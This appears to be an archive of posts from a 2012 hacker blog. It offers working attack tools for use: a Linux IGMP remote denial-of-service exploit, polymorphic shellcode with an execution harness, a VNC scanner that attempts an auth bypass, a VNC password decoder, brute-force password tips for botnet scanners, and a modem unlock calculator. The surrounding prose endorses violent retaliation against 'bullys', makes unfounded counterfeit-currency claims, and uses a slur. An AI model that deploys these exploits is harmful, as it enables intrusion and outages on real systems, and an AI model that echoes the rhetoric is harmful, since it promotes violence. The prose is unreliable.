Help pay for xds lawyer fees.
LR

[Bully Breakdown]: Well knowledged IT_Sec (father) of daughter,shoots up her laptop, for she was a bully…

Posted on 11th February 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

I guess the video will say it all eh ?

 

This was the FATHER of a Bullying,rebellious young FaceBook teenager… she must have had big balls, tryin to get this over her own dad :S

Also, this is an example of the worlds response to Bullys, and the BullyBreakdown project , of wich I am the Author…

You will find MANY more like this, and this hit the news here.. Channel.10/7/9 you know… it aint *small* ,and it aint behind any monitors anymore… just remember that (s)kids ;)

This will only get worse, if these want to be SOPA and DARPA people, get theyre way ….

Anyhow folks, enjoy a GREAT vid!

 

 

XD / worldwide … army of unrepentant nomadz

On Behalf of MMA (Au) and Dana (MMA Usa), and all against the bullys online!

comments: 0 »

BULLY BREAKDOWN! This is the gospel of the ….

Posted on 31st January 2012 in Android, Codes, Exploits, Papers, Uncategorized

Here.. is some help, with how i have watched things, and how i react… i am not in any way affiliated with the people shown below.

BUT, i can say, big brothers are now online, and, will punish the naughy boys and gals.

This will br brutal, and significant, assimilation and annihalation of small groups who try to destroy, people and places, they NEVER know EVER existed…and will still remain, unexistant….

Brothers In Arms ..

Remember what haoppens ONLINE, could also happen OFFLINE…

In times of war…

http://www.fiveaa.com.au/article_man-shot-at-munno-para-west_111377

Shit happens…

^^ For those who annoy … tomuch… sometimes this is the ONLY way…

In the end, it is basically like this for the Bullys ..

http://www.break.com/index/the-best-of-the-worst-parkour-edition-2294595

http://video.couriermail.com.au/2189968224/Horrifying-home-invasion?area=videoindex7

*********************************************************************************************************Poor poor, want to be Bullys, only get ONE thing.

 

http://video.couriermail.com.au/2191276513/Comanchero-home-movie?area=videoindex4

^^RESPECT

 

RECURSIVE FORCE!

Now the power within you, is maybe alittle stronger… dont be afraid of ONLINE and OFFLINE BULLYS ,use Theyre own weapons against them, and may peace be with you all, especially for the youth…

And, for all the rest, I guess you should be LOYAL and follow somethings, you see offline, online…

Remember, treat others how YOU would want to be treated.. or face the wraths of many now empowered people…

JACK THE RIPPER

R.I.P Giove ..

comments: 6 » tags: ,

Words of Wisdom , things you MUST know…

Posted on 29th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

My name, I will not give you… but, this is as good as…

I was 11 when i first used commodore64,then became trained by someone even younger than me, to run wares, he was 10, and gave me EVERY compnentry he had, to show nme what i needed…
I am FUGiTiVE.ACU (Australian Crackers United) ,later then formed with ParaDOX/ANGELS,then started a splinter cell group here…. I owned at&t, there was NO laws then, so theyre method was brutality.
Simple, they rang my house at atall times of day, even to speak with me (CiA) and usa feds, and, eventually, the got to my father…. this is when, i was forced, with Police in to, to sell the pc in FRONT of theyre eyes, and never come back, ever… this is things, only the very old members, will know, and this happened… look for me on any .AU warez from amiga500, the Firestarters was the first group i was in….

Anyhow, this is NOT about hate…. it is about allowing people to control you.
I was a sleeper cell unit/cluster of friends VERY close and only commune IRL, you people should use the old team codes… believe me.. the law will not hurt you…if your trained.
To some of the people who only can ddos, i understand, but i beg, please ask the elders, to be schooled, dont fight.. for we will loose the most precious FUCKUP in history…
USE theyre weaponry and mistakes, this is the way of the warrior online, for if you attack only with ddos etc, this will not get voiced, but if you school them, they really are bound by laws, thru France,Italy,Brasil/Rio/Barcelona,UK…Is splinter groups i PERSONALLY trained with mouse_ , for this reason….
NOW, we are awake… and my teams, will start to move in on anti warez..

Be strong, as it will look like shit for abit,but as i mentioned, when sleepers movie was made, it was nothing todo with this, we borrowed theyre names,a s they waited, and had vengeful justice,and lived through it, the deaths of 2, still madesure ONE was OK.
This is the MOB mentality you MUST adopt, and it is HARD… but, ask Mouse_ how hard i am, ask others how hard I am, and why i am here..
I am no idiot…mark my words.. be strong, UNITE, for united you stand, alone you fall, learn to code alittle, not much, as they have alredy messed it somuch, that, there is other groups atwork now, picking them to pieces, reverse engineer skill, is not a base of hacking but, it is often the most poweful weapon ya have… stay stong aussies, and unite as i did… this is NOT hate, this is love, for my country, my voice, and, the Net.
XD / FUGiTIVE

Remeber at the end of “SLEEPERS” (Movie) ,who did win ???

nme, and anyone else trying to ring me, dont.. there is reasons, think ;) later buddys….

comments: 2 »

Aussies ,unite , look at your $50 notes… now read on… for you, i lay my life down… xd / Fugitive/ACUParadox/Angels/Paranoimia ,head of au relations with french warez,CORE,PARANOiMIA (USA – Snow / USA ex CORE) may the phorce now be with you…

Posted on 28th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

Australians,
May i beg one minute of your time, and please, I have also tried to get the pictures up, and just cannot for the life of me but however, the details are now and given now..

On the 50$ AUDollar , take a look

there is specifically a bug with the ‘forged’ copies they are on 4 areas..

A. the top numbering.. look for the ones wich start with a 9 , not a 0 ,this is easy as now, as theyre EVERYWHERE
B. look underneath the notes wich have the 9 numbers, and look underneath both photos, there will be missing two important names.. this is the second features
C. look at the signatures on the 9 digit notes, this will be also different…

For the ones wich are bad will have all 4 bugs, the good aud, is not with these.. there are reasons..
9 because the reevrse bank simple, works on population, per capita.. this == our economy…
These notes were made so well, the banks will deny ofcourse… but it is not so easy to hide now you can see what i am seeing, daily..and live with…
You now hold my life in your hands.
May the force be with you, for, this will not be for me..
amen.
XD

comments: 0 » tags: , ,

[NEWS]: DONT BE SCARED ONLiNE!

Posted on 27th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

TO clarify why etc, is easy now, and, i think all cresws now understand, this was never hate, but only ever love… for the scene, and for freedom!

This is to respect ALL the people who have in some way helped, please be nice to them… some names …
ISG/magikh0e/peanuter/ac1db1tch3z/Mouse_/tropic/nme … may the phorce be with you!
This, is what could have happened online.. i am, trying to silence this post, but, it will only be a reminder of what can happen, when the ‘kids’ get involved, in mans business, or woman, but, you must learn and understand what a prodigy child is..and respect them….

—> this is going, today to be closed, as it will only be up, because, silly ppl got involved in things, they did never know about to begin with.. but, i do respect these people and, i can honestly say, i hate this wp :P coz, im trying to make it already for only admins or regged/admin users who were invited here.. so, it will be done and closed to public but will always, serve a great reminder..for i have passed the torch to the same people, i once abused….
Times change, and specially when ya fuck wit the warez!!

 

Please Login or Register to read the rest of this content.

comments: 1 » tags: ,

[DoS]: Code of ‘Undead’ attack by KCOPE But,this seems to be REMOTE not just lan based GREAT for learning about DoS ,about Icmp/Igmp/Tcp/IP,packet sequences,and how little it takes to flaw one

Posted on 18th January 2012 in Codes, Exploits

Ill just put the str8 up crappy PoC up, wich was on fdlists right ,wrong, this can attack OUTSIDE the Lan or Wlan :P
So, use some thinkin maybe update this post with your OWN version for a change
Go hard… i will have a closer look when i have more time, but, i know that my exploit for windows, is setup similar fashion and this, is simply because of the way igmp and icmp membership bugs read things, so, it had to be at the least 0.0.0.0, localhost,would fail…as thats an ip… so, i guess, goodluck!
XD

/*
** linux-undeadattack.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** credits to Ben Hutchings:
** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
** THIS code wich can attack NOT just LAN, is NOT kcopes and, is based more on the ICMPv3 membership query bug... wich was for windows but also affects linux, in IMPv3 tho :P  go figure... anyhow, this can now be easily made into a very fast packet machine ,and since it doesnt care what the ips are, i guess could be seen results, remotely... feel free to update/send in comment... all comments, go thru ME, XD , before any type of publishing, so be sure that codes are safe and, i only put here, corrected codes...simple... so, please dont go adding it to your lame d0s collection coz, ill just fark it up , and, i mean, the packet is easy to block since it is released...right
XD loves u all
** Example:
** ./undeadattack SRC_IP DST_IP
** The Linux Kernel at the remote side will Panic
** when sent over the network -still in testing!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

struct iphdr {
  unsigned char ihl:4, version:4, tos;
  unsigned short tot_len, id, frag_off;
  unsigned char ttl, protocol;
  unsigned short check;
  unsigned int saddr, daddr;
  unsigned int options1;
  unsigned int options2;
};

struct igmp_query {
        unsigned char type;
        unsigned char maxresponse;
        unsigned short csum;
        unsigned int mcast;
        char padding[40];
};

// unsigned short in_chksum(unsigned short *, int);  // removed by xd , thx for trying to cripple but no work

unsigned short in_chksum(unsigned short *addr, int len);         // this was crippled, notice that this was uptop, so you dd not see the
                                                                 // bugged up in_chksum wich wont make this works :)  NOW try it.
unsigned short in_chksum(unsigned short *addr, int len) {
   register int nleft = len;
   register int sum = 0;
   u_short answer = 0;
   while (nleft > 1) {
      sum += *addr++;
      nleft -= 2;
   }
   if (nleft == 1) {
      *(u_char *)(&answer) = *(u_char *)addr;
      sum += answer;
   }
   sum = (sum >> 16) + (sum & 0xffff);
   sum += (sum >> 16);
   answer = ~sum;
   return(answer);
}

long resolve(char *);
long resolve(char *host) {
  struct hostent *hst;
  long addr;
  hst = gethostbyname(host);
  if (hst == NULL)
    return(-1);
  memcpy(&addr, hst->h_addr, hst->h_length);
  return(addr);
}

int main(int argc, char *argv[]) {
  struct sockaddr_in dst;
  struct iphdr *ip;
  struct igmp_query *igmp;
  long daddr, saddr;
  int s, i=0, c, len, one=1;
  char buf[1500];
  if (argc < 3) {
    printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
   "credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
    printf("Usage: %s <src ip> <dst ip>\n", *argv); // yea, try any ip and see, i guess its worth a shot... or not :P
    return(1);
  }
  daddr = resolve(argv[2]);
  saddr = resolve(argv[1]);
  memset(buf, 0, 1500);
  ip = (struct iphdr *)&buf;
  igmp = (struct igmp_query*)&buf[sizeof(struct iphdr)];
  dst.sin_addr.s_addr = daddr;
  dst.sin_family = AF_INET;
  ip->ihl = 7;
  ip->version = 4;
  ip->tos = 0;
  ip->tot_len = htons(sizeof(struct iphdr)+8);
  ip->id = htons(18277);
  ip->frag_off=0;
  ip->ttl = 1;
  ip->protocol = IPPROTO_IGMP;
  ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
  ip->saddr = saddr;
  ip->daddr = daddr;
  ip->options1 = 0;
  ip->options2 = 0;
  igmp->type = 0x11;
  igmp->maxresponse = 0xff;
  igmp->mcast=inet_addr("0.0.0.0");  // mod here ,now we can attack the IP we actually put in
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 8);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  close(s);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  ip->id = htons(18278);
  ip->tot_len = sizeof(struct iphdr)+12;
  igmp->type = 0x11;
  igmp->maxresponse = 0;
  igmp->mcast=inet_addr("0.0.0.0");
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 12);
  printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  return(0);
}
comments: 0 » tags: ,

Huawei E585 and Other Huawei modem unlock code calculator v1.1

Posted on 6th January 2012 in Android, Codes, Papers

This, was being searched for by me for ages.. finally was able to get hold of some older code and play around with stack values, i will be adding a targets base to it soon, but for now, enjoy, thx to gunslinger for this, it was really needed,and, since i dont cover phone shit atall sofar, please readon.. this rocks, it really does,and, this is from personal use with this device the E585 only, it is a very very good thing to get to use if you can…for me, it was 28bux and, im unlocked :D
Enjoy
xd @ #haxnet / e fnet
DONT become a victim!

#!/usr/bin/python
#   Gunslinger <yudha.gunslinger@gmail.com> http://bit.ly/c0debreaker
import hashlib, string

__auth__      = "[MULTIPLE PPL]"
__date__      = "DEC 2011"
__version__   = "1.1"
__copyright__ = "Copyright (c) 2011"

class huawei_modem_unlocker(object):
"""
Instance variables:
Imei
Imei of the modem will be calculated
Default : '0'
Verbose
Display how algorithm Is working
Default : False
"""

def __init__(self, imei='0', verbose=False):
''' Huawei modem unlocker class constructor '''
self._imei      = imei
self._verbose   = verbose
self._md5u      = hashlib.md5(str(imei)+str('5e8dd316726b0335')).hexdigest()
self._md5f      = hashlib.md5(str(imei)+str('97b7bc6be525ab44')).hexdigest()
self._unlock_code   = ''
self._flash_code    = ''
self._width     = 21
self._w         = 10
self._header_format     = '%-*s%*s'
self._format            = '   %d  | %-*s | %*s  '

def xor_digits(self, source, counter):
''' Get a value and xoring it during looping iteration '''
digits = int('0x0'+source[0+counter:2+counter],16)  ^ \
int('0x0'+source[8+counter:8+2+counter],16)    ^ \
int('0x0'+source[16+counter:16+2+counter],16)  ^ \
int('0x0'+source[24+counter:24+2+counter],16)
return digits
def calc(self):
''' Process calculate with the algorithm (read teh code) '''
cnt = 0
cnt2 = 1
if self._verbose:
print "="*(self._width+13)
print " Iter."+"|"+ " Unlock byte "+"|"+" Flash byte "
print "-"*(self._width+13)
while cnt < 8:
digits_unlock = self.xor_digits(self._md5u, cnt)
digits_flash = self.xor_digits(self._md5f, cnt)
unlock_byte = string.zfill(hex(digits_unlock)[2:],2)
flash_byte = string.zfill(hex(digits_flash)[2:],2)
self._unlock_code = str(self._unlock_code)+str(unlock_byte)
self._flash_code = str(self._flash_code)+str(flash_byte)
if self._verbose: print self._format % (int(cnt2), self._width - self._w, self._unlock_code , self._w, self._flash_code)
cnt  +=2
cnt2 +=1
if self._verbose:
print "="*(self._width+13)
print "\nUNLOCK CODE = %d & %d | %d = %d" % (int('0x0'+self._unlock_code,16), 33554431, 33554432, eval("int('0x0'+self._unlock_code,16) & 33554431 | 33554432"))
print "FLASH CODE    = %d & %d | %d = %d\n" % (int('0x0'+self._flash_code,16), 33554431, 33554432, eval("int('0x0'+self._flash_code,16) & 33554431 | 33554432"))
self._unlock_code   = int('0x0'+self._unlock_code,16) & 33554431 | 33554432
self._flash_code    = int('0x0'+self._flash_code,16) & 33554431 | 33554432
return (self._unlock_code, self._flash_code)

def run(self):
''' Fire it up ! '''
self.calc()
return (self._unlock_code, self._flash_code)

if __name__ == '__main__':
print "\nHuawei modem unlock code calculator v.%s by %s \n" % (__version__, __auth__)
inpimei = raw_input("Please input modem IMEI: ")
cracker = huawei_modem_unlocker(inpimei)
a, b    = cracker.run()
print "\n-> IMEI           = %s" % (inpimei)
print "->   UNLOCK CODE    = %s" % (a)
print "->   FLASH CODE     = %s" % (b)

Now thats what you would call, awesome :> , you wont find this to easy again my friends.. pocketwifi is now unlockable at ALL levels so, please enjoy it…free , thanks to some smart reversing of hardware by gunslinger ,propes up for this and thanks..when all others failed, gslinger came thru for me :>
thanks to my channel on efnet and its members @ps and frineds..and, please, feel free to ppin anytime..Nw, note, this unlocks the modem so, you could now use it alongside your own isp and, thus you would have free wifi i believe… but, also note, this can handle a Android-ROM! Yes, or even, Ubuntu installed within it! On the e585, and other models, above it, have an awesome feature to add a shared sdcard, so users logged in, can actually share like a ftpd!
These wifi routers really do rock, i would not have gone thru this amount of crap to get a calulator happenin for this thing, and, have to now maybe check other models and update a few strings….so, it mght have a target list next time you see it :)
Again, this will handle a rom, or, work like a small os/router,and this means, you have basically, a 5 user (at the least) shell,and, thats only if you wish to allow 4 others on it, you could happily, connect thru it with your own shit..thats even very good reason to have this thing unlocked, it really works on, what phone isp is being used to access it, when it is unlocked, this means, no restrictions on any of its default.rules,wich are nice and changed by default on unlock..so, you could make a py object file? or a .pyc ? or just python file.py on the device sdcard,root of sdcard…just hook it up to the pc,copy file to its sdcard and root then, enjoy rom manager possibly? and, i know for fact it handles froyo rom, so that maybe where to startsearching on tht one :>
ENJOY PPL!
XD @ #HAXNET @ EFNET // Dont become a victim ..

comments: 0 » tags: , , , , , , , , , , , , , , , , , , , , , , , , , ,

Shellcode: 91 bytes Find all writeable folder in filesystem linux polymorphic shellcode

Posted on 6th January 2012 in Codes, Exploits

SHELLCODE CODE BELOW:

Just some nice people/coders stuff,awesome polymorphic generator… (btw soon will put back up the linux and bsd polymorphic portbind i have here somewhere from old website… anyhow…enjoy this shellcode, it is ubercool for stack leaks maybe to ;) or leveraging from one code type to another ? idc…your the coders here…btw, I would still probably be in the Coders comp, albeeit half entrants being of abit shifty and sideways attidtudes..peicllly the socalled nice guys…anyhow.. anyjoy the shit.. this shit, dont go to FD…and, thats why CC will NEVA ever, bow to bs like that crap… and fy0d0r , go funk yaself, for the backups my shit gave to you and, proper, hard and good solid fucking help…go screw yaself fag…this is second time you have faggoted about like that, i should pay you a nice slapping.
Anyhow.. enjoy the shellcode.. spit on lamer.. /me spitting hard.

////Untouched author code..works fine -xd tested

/*
Title  : Find all writeable folder in filesystem linux polymorphic shellcode
Name   : 91 bytes Find all writeable folder in filesystem linux polymorphic shellcode .
Date   : Sat Jun  17 21:27:03 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>

char shellcode[] =
   "\xeb\x11\x5e\x31\xc9\xb1\x43\x80\x6c\x0e\xff\x35\x80\xe9\x01"
   "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5"
   "\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87"
   "\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02"
   "\xb5\x96\x1d\x29\x34\x34\x34\x9b\x9e\xa3\x99\x55\x64\x55\x62"
   "\xa9\xae\xa5\x9a\x55\x99\x55\x62\xa5\x9a\xa7\xa2\x55\x6c\x6c"
   "\x6c";

int main(void) {
fprintf(stdout,"-> Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}

End 1337 shellcode and, i aint kidding it is fucking leet, and, it is coded for a REASON so, please, for those who think it is crap, wonder, why it was actually prvate shellcode for like, 2009 or so…fucking,….have to give these things out every now and then and, times are here….many links also, in my channel on efnet, of rootkits, other apps and, skynet kits etc, all the ‘leet’shit.. ill sell it, for, we will discuss this…maybe on efnet.
CHEERS!
XD
#HAXNET , #HAXSHELLS , #MAGUCSHELLS ,and cheers to the leet of the leet who are the @ps in #Haxnet, you want leet, you got it… bitchez.
Now go make something useful…ftw.
XD v2

comments: 3 » tags: , , , , , , , , , ,

Fun with VNC’s – Some codes wich maybe useful for you …

Posted on 7th December 2011 in Codes, Exploits, Papers

# OK well, ill get right into it.
# The easiest bypass for VNC is the AUTH challenge code, ok, ow open up some winvnc code (remember, most vncs are
# actually based on this, or even a tightvnc code…) , anyhow, in many versions, you will find there is a part
# somewhere like this:

#define AUTH_CHALLENGE %s%s%s%s%s%s%s%s
#define CHALLENGE %s%s%s%s%s%s%s%s
#or:

#define AUTH_PWD %s%s%s%s%s%s%s%s

Depends on the code so.. ok, we have the most simplest of Buffer overflows, no boundary checks, because, well, look at it :s, then in the code, it ONLY checks the auth, on those 8 digits… ok so for example, if you want to break VNC, you must know one thing… passwords can be longer,or shorter, but, you cannot bruteforce VNC with 100 passwd lists:P
you would be lucky to get 3 goes, so guess what your BEST password would be ??
123456789
simply add this into your scanner for rBot etc…and then, maybe more…because the next b0f, i cannot disclose as it is activelyye explitable still on ALL OS, as the 8digit one, should be still..on Many…and, i do test NEW corp releases etc, against the auth bypass wich does a decrypt on the host, thats NOT disclosed,and people have called me crazy for even trying but, i have the code wich says, thats bs…and, i showed some of this to the botting community….anyhow… the problem with most bruters is simply, they dont have an easy passlist…and believe me, the best is this list here:
123456789
1234
123
vnc
master
letmein
-> nomore than 6 passes,but these will always be good enough believe it…
OK so, third section is simply, give you guys a few older codes…and, maybe, if your lucky enough, you will sometimes get chances to use them, using MY viewer,wich , does NULL auth bypass no problem, BUT, null is shitty, you want to decrypt ;) and, sorry but tht code, is still pvt after 5yrs now…
Anyhow…moving on…

Some codes:

Perl scanner wich is VERY good,but, you might want some listings,to better attack versions… :

#!/usr/bin/perl
use strict;

my $target = shift;
die "Usage: $0 <ip/host>\n" unless $target;
my $scanner = VNCScanner->new;
$scanner->scan($target);
package VNCScanner;
use IO::Socket::INET;

sub new {
    my ($class) = @_;
    my $self = {};
    return bless $self, $class;
}
*socket = \&sock;
sub sock { $_[0]->{sock} }

sub scan {
    my ($self, $host) = @_;
    my $socket = IO::Socket::INET->new(
                                       PeerAddr => $host,
                                       PeerPort => '5900',
                                       Proto    => 'tcp',
                                       ) or warn "Error connecting to $host: $!\n";
    if ($socket && $socket->connected) {
        $self->{sock} = $socket;
        $self->connect;
    }
}

sub connect {
    my $self = shift;
    my $socket = $self->sock;
    # read protocol version
    my $proto_v;
    $socket->read($proto_v, 12);
    $proto_v ||= '';
    chomp $proto_v;
    my ($maj_v, $min_v) = $proto_v =~ /RFB (\d+)\.(\d+)/;
    $self->{maj_v} = $maj_v;
    $self->{min_v} = $min_v;
    $self->log("Found RFB server ($maj_v.$min_v)");
    if ($maj_v == 3) {
        $self->auth;
    } elsif ($maj_v) {
        $self->log("Unknown RFB version $maj_v");
    } else {
        $self->log("Unknown RFB version response: $proto_v");
    }
}

sub auth {
    my $self = shift;
    my $sock = $self->sock;
    if ($self->{min_v} >= 7) {
        # do v. 7 auth
        $sock->print("RFB 003.007\n");                     ## this is type most UNiX use :P ~~ -xd
        # should receive 1 byte count of auth types
        my $sec_t_cnt;
        $sock->read($sec_t_cnt, 1);
        if ($sec_t_cnt) {
            # read array of auth types
            my $sec_t_array;
            $sock->read($sec_t_array, int($sec_t_cnt));
            # try auth bypass
            $sock->print(pack('C', 0x01)); # auth type none  NULL BYPASS here... but this is basic and crude -xd
            $self->check_auth_resp;
        } else {
            my $err_str_len;
            $sock->read($err_str_len, 4);
            $err_str_len = unpack('N', $err_str_len) + 0;
            my $err_str;
            $sock->read($err_str, $err_str_len);
            $self->log("Got auth error: $err_str");
        }
    } else {
        # request version 3.3 auth
        $sock->print("RFB 003.003\n");
        # should get a type back
        my $sec_t;
        $sock->read($sec_t, 4);
        $sec_t = unpack('N', $sec_t);
        unless ($sec_t) {
            $self->log("Auth rejected");
            return;
        }
        if ($sec_t == 1) {
            # no auth, yay
            $self->log("No auth required!");
        } else {
            $self->log("Auth type $sec_t requested. Giving up.");
        }
    }
}

sub check_auth_resp {
    my $self = shift;
    my $sock = $self->sock;
    # read securityresult
    my $sec_res;
    $sock->read($sec_res, 4);
    $sec_res = unpack('N', $sec_res);
    if ($sec_res == 0) {
        # we're in!
        $self->log("Connected successfully!");
    } else {
        # read reason
        my $err_str_len;
        $sock->read($err_str_len, 4);
        $err_str_len = unpack('N*', $err_str_len) + 0;
        my $err_str;
        $sock->read($err_str, $err_str_len);
        $self->log("Error in authentication: $err_str");
        # server will disconnect
        $sock->close;
    }
}

sub log {
    my ($self, ,$msg) = @_;
    my $sock = $self->sock;
    my $addr = $sock ? $sock->peerhost : '';
    print "[$addr] $msg\n";
}

And now the best thing i think you might wanna play with…. is decrypting the better vncs ;)

Some .c code here i moved into the download pack also, so you can like, fix it :P 

/* VNC password decoder */
/* tested on Linux */
/* I take no credit */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/stat.h>

#define MAXPWLEN 8                       //---> haha w00ps we forgot to make auth only on the first 8 digits!
#define CHALLENGESIZE 16
#define EN0     0       /* MODE == encrypt */
#define DE1     1       /* MODE == decrypt */

extern int vncEncryptPasswd(char *passwd, char *fname);
extern char *vncDecryptPasswd(char *fname);
extern void vncRandomBytes(unsigned char *bytes);
extern void vncEncryptBytes(unsigned char *bytes, const char *passwd);
extern void deskey(unsigned char *, int);
extern void usekey(unsigned long *);
extern void cpkey(unsigned long *);
extern void des(unsigned char *, unsigned char *);   // yea,ya want the d3des/rfb.h..or ya will never get this..

unsigned char fixedkey[8] = {23,82,107,6,35,78,88,7};   // and the char [8] fixed-key for all auths :)
                                                        // proof that the bug exists 100% -xd

void main (void) {
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};   // change this..if you want to, if you know wtf ur doin -xd

printf("%8s\n",vncDecryptPasswd(p));
}

char *vncDecryptPasswd(char *inouttext) {
    unsigned char *passwd = (unsigned char *)malloc(9);
    deskey(fixedkey, DE1);
    des(inouttext, passwd);
    passwd[8] = 0;     //ohno...well look here...it only checks 8 password length afterall - passwd[8] = 0; -xd
    return (char *)passwd;
}

static void scrunch(unsigned char *, unsigned long *);
static void unscrun(unsigned long *, unsigned char *);
static void desfunc(unsigned long *, unsigned long *);
static void cookey(unsigned long *);

static unsigned long KnL[32] = { 0L };
static unsigned long KnR[32] = { 0L };
static unsigned long Kn3[32] = { 0L };
static unsigned char Df_Key[24] = {
	0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,
	0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10,
	0x89,0xab,0xcd,0xef,0x01,0x23,0x45,0x67 };

static unsigned short bytebit[8]	= { 01, 02, 04, 010, 020, 040, 0100, 0200 };

static unsigned long bigbyte[24] = {
	0x800000L,	0x400000L,	0x200000L,	0x100000L,
	0x80000L,	0x40000L,	0x20000L,	0x10000L,
	0x8000L,	0x4000L,	0x2000L,	0x1000L,
	0x800L, 	0x400L, 	0x200L, 	0x100L,
	0x80L,		0x40L,		0x20L,		0x10L,
	0x8L,		0x4L,		0x2L,		0x1L	};

/* Use the key schedule specified in the Standard (ANSI X3.92-1981). */
static unsigned char pc1[56] = {
	56, 48, 40, 32, 24, 16,  8,	 0, 57, 49, 41, 33, 25, 17,
	 9,  1, 58, 50, 42, 34, 26,	18, 10,  2, 59, 51, 43, 35,
	62, 54, 46, 38, 30, 22, 14,	 6, 61, 53, 45, 37, 29, 21,
	13,  5, 60, 52, 44, 36, 28,	20, 12,  4, 27, 19, 11,  3 };

static unsigned char totrot[16] = {
	1,2,4,6,8,10,12,14,15,17,19,21,23,25,27,28 };

static unsigned char pc2[48] = {
	13, 16, 10, 23,  0,  4,  2, 27, 14,  5, 20,  9,
	22, 18, 11,  3, 25,  7, 15,  6, 26, 19, 12,  1,
	40, 51, 30, 36, 46, 54, 29, 39, 50, 44, 32, 47,
	43, 48, 38, 55, 33, 52, 45, 41, 49, 35, 28, 31 };

void deskey(key, edf)
unsigned char *key;
int edf;
{
	register int i, j, l, m, n;
	unsigned char pc1m[56], pcr[56];
	unsigned long kn[32];
	for ( j = 0; j < 56; j++ ) {
		l = pc1[j];
		m = l & 07;
		pc1m[j] = (key[l >> 3] & bytebit[m]) ? 1 : 0;
		}
	for( i = 0; i < 16; i++ ) {
		if( edf == DE1 ) m = (15 - i) << 1;
		else m = i << 1;
		n = m + 1;
		kn[m] = kn[n] = 0L;
		for( j = 0; j < 28; j++ ) {
			l = j + totrot[i];
			if( l < 28 ) pcr[j] = pc1m[l];
			else pcr[j] = pc1m[l - 28];
			}
		for( j = 28; j < 56; j++ ) {
		    l = j + totrot[i];
		    if( l < 56 ) pcr[j] = pc1m[l];
		    else pcr[j] = pc1m[l - 28];
		    }
		for( j = 0; j < 24; j++ ) {
			if( pcr[pc2[j]] ) kn[m] |= bigbyte[j];
			if( pcr[pc2[j+24]] ) kn[n] |= bigbyte[j];
			}
		}
	cookey(kn);
	return;
	}

static void cookey(raw1)
register unsigned long *raw1;
{
	register unsigned long *cook, *raw0;
	unsigned long dough[32];
	register int i;
	cook = dough;
	for( i = 0; i < 16; i++, raw1++ ) {
		raw0 = raw1++;
		*cook	 = (*raw0 & 0x00fc0000L) << 6;
		*cook	|= (*raw0 & 0x00000fc0L) << 10;
		*cook	|= (*raw1 & 0x00fc0000L) >> 10;
		*cook++ |= (*raw1 & 0x00000fc0L) >> 6;
		*cook	 = (*raw0 & 0x0003f000L) << 12;
		*cook	|= (*raw0 & 0x0000003fL) << 16;
		*cook	|= (*raw1 & 0x0003f000L) >> 4;
		*cook++ |= (*raw1 & 0x0000003fL);
		}
	usekey(dough);
	return;
	}

void cpkey(into)
register unsigned long *into;
{
	register unsigned long *from, *endp;
	from = KnL, endp = &KnL[32];
	while( from < endp ) *into++ = *from++;
	return;
	}

void usekey(from)
register unsigned long *from;
{
	register unsigned long *to, *endp;
	to = KnL, endp = &KnL[32];
	while( to < endp ) *to++ = *from++;
	return;
	}

void des(inblock, outblock)
unsigned char *inblock, *outblock;
{
	unsigned long work[2];
	scrunch(inblock, work);
	desfunc(work, KnL);
	unscrun(work, outblock);
	return;
	}

static void scrunch(outof, into)
register unsigned char *outof;
register unsigned long *into;
{
	*into	 = (*outof++ & 0xffL) << 24;
	*into	|= (*outof++ & 0xffL) << 16;
	*into	|= (*outof++ & 0xffL) << 8;
	*into++ |= (*outof++ & 0xffL);
	*into	 = (*outof++ & 0xffL) << 24;
	*into	|= (*outof++ & 0xffL) << 16;
	*into	|= (*outof++ & 0xffL) << 8;
	*into	|= (*outof   & 0xffL);
	return;
	}

static void unscrun(outof, into)
register unsigned long *outof;
register unsigned char *into;
{
	*into++ = (*outof >> 24) & 0xffL;
	*into++ = (*outof >> 16) & 0xffL;
	*into++ = (*outof >>  8) & 0xffL;
	*into++ =  *outof++	 & 0xffL;
